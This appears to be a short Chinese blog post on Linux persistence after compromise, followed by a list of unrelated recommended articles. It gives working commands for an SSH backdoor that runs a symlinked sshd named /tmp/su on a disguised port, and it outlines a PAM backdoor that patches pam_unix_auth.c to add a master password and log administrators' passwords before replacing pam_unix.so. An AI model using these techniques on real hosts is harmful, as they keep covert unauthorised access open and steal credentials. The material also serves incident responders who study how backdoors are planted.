Linux权限维持

SSH 后门

软链接sshd

目标主机建立软连接:

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=1189

#端口可以任意指定,最好伪装一下

查看端口:

netstat -anlp|grep 1189

攻击机ssh登录:

ssh root@x.x.x.x -p 1189

#如果root用户被禁止登陆时,可以利用其他存在的用户身份登陆

具体原理:https://www.cnblogs.com/likaiming/p/11007919.html

Linux PAM密码记录后门

PAM(Pluggable Authentication Modules),是由Sun提出的一种认证机制。它通过一共一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。

这种后门主要是通过pam_unix_auth.c打补丁的方式潜入到正常的pam模块中,以此来记录管理员的账号密码。其大致流程如下:

1.获取目标系统所使用的PAM版本,下载对应版本的pam版本

2.解压缩,修改pam_unix_auth.c文件,添加万能密码

3.编译安装PAM

4.编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即可使用万能密码登陆,并将用户名密码记录到文件中。

参考:

Linux-PAM后门

其他方法请参考:

第4篇:Linux权限维持--后门篇 · 应急响应实战笔记

Linux 下的权限维持 - V4ler1an

相关推荐
ShineWinsu5 分钟前
对于Linux:网络基础的解析
linux·网络·面试·udp·笔试·ip·tcp
Asuicao14 分钟前
centos7.9版本升级ssh OpenSSH 9.8p1 源码 OpenSSL 1.1.1w 源码包以及安装升级回滚文档
运维·ssh
耍酷的魔镜35 分钟前
谈谈如何使用Netty开发实现高性能的RPC服务器
服务器·网络协议·rpc
志栋智能1 小时前
超自动化安全中的威胁狩猎
运维·安全·自动化
↘"LYong1 小时前
旧版 CentOS 安装 Docker 完整指南(附国内镜像加速)
linux·运维·docker
Zhang~Ling2 小时前
Vim 多模式详解:命令、插入、底行与插件配置
linux·编辑器·vim
Elastic 中国社区官方博客2 小时前
Elastic 在 Everest Group 企业搜索产品 PEAK Matrix® 评估 2026 中被评为领导者
大数据·运维·人工智能·elasticsearch·搜索引擎·ai·全文检索
程序员在囧途2 小时前
likeadmin-api API 中转站怎么做统一报价?从 /pricing、/user/balance 到 task_id 回执的落地方法
运维·服务器·数据库·likeadmin-api·api中转站·token计费
cookies_s_s2 小时前
C++ 字符串动态创建对象 -- 工厂模式、自动注册、模板递归动态调用
服务器·开发语言·c++
想你依然心痛3 小时前
Linux用户空间与内核空间通信:netlink、ioctl、mmap 零拷贝与性能对比
linux·运维·服务器